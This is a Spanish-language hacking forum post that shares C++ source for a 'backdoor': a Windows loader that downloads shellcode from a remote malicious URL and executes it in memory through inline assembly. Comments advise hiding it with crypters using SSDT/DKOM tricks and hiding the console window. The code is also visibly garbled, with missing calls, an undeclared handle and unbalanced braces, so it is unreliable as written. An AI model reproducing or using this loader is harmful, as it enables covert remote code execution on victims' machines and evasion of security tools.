C++ Advanced Backdoor

Iniciado por StevenKhooks, 16 Junio 2014, 04:16 AM

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Hola a todos les comparto el siguiente video tutorial aqui utilizamos metasploit msfpayload recuerden que donde esta el archivo.bin es el backdoor . ustedes pueden hacerlo con archivos backdoor.exe tambien  :D

//No crea archivos temporales en el sistema
//EL proceso es visto por el administrador de tareas pero se puede ocultar facilmente si lo pasan por un builder o crypter que tenga la opcion SSDT o DKOM para olcultarlo del administrador de tareas y process explorer y muchos mas es la imaginacion



   //include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
   #include <windows.h>
   using namespace std;
   //this is a buffer with shellcode data in .bss section
   unsigned char DataReceived[500];
   int main(){
       int i;
       //this configure a HTTP agent to surf
     HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
       //if for validate connection.
         cout<<"Connection Failed or Syntax error";
         return 0;
    //Open a malicious url
    //this check the handler for URL
      if ( !OpenAddress )
         DWORD ErrorNum = GetLastError();
         cout<<"Failed to open URL \nError No: "<<ErrorNum;
         return 0;
      DWORD NumberOfBytesRead = 0;
      //this recovery a file on server and save data into DataReceived
      while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
      //this print the data in format \x00 you can delete this routine
      for(i=0;i<sizeof DataReceived; i++ ){
      /*this routine is a other implementattion of shellcode-test but in this routine i use  __asm () directive for call asm intrucctions.
      1)first i store a pointer to buffer in EAX register
      2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
      3)the ret instruction put the value of esp+4 into eip and pass the execution.
      4)finally the shellcode in DataReceived is executed
      5)all handler is closed.
           you can put a nopsled before shellcode for estabilish execution .
           use freeconsole for hidden a Dos Windows
   __asm ("lea _DataReceived, %eax");
   __asm ("push %eax");
   __asm ("ret");
      return 0;

of Belfort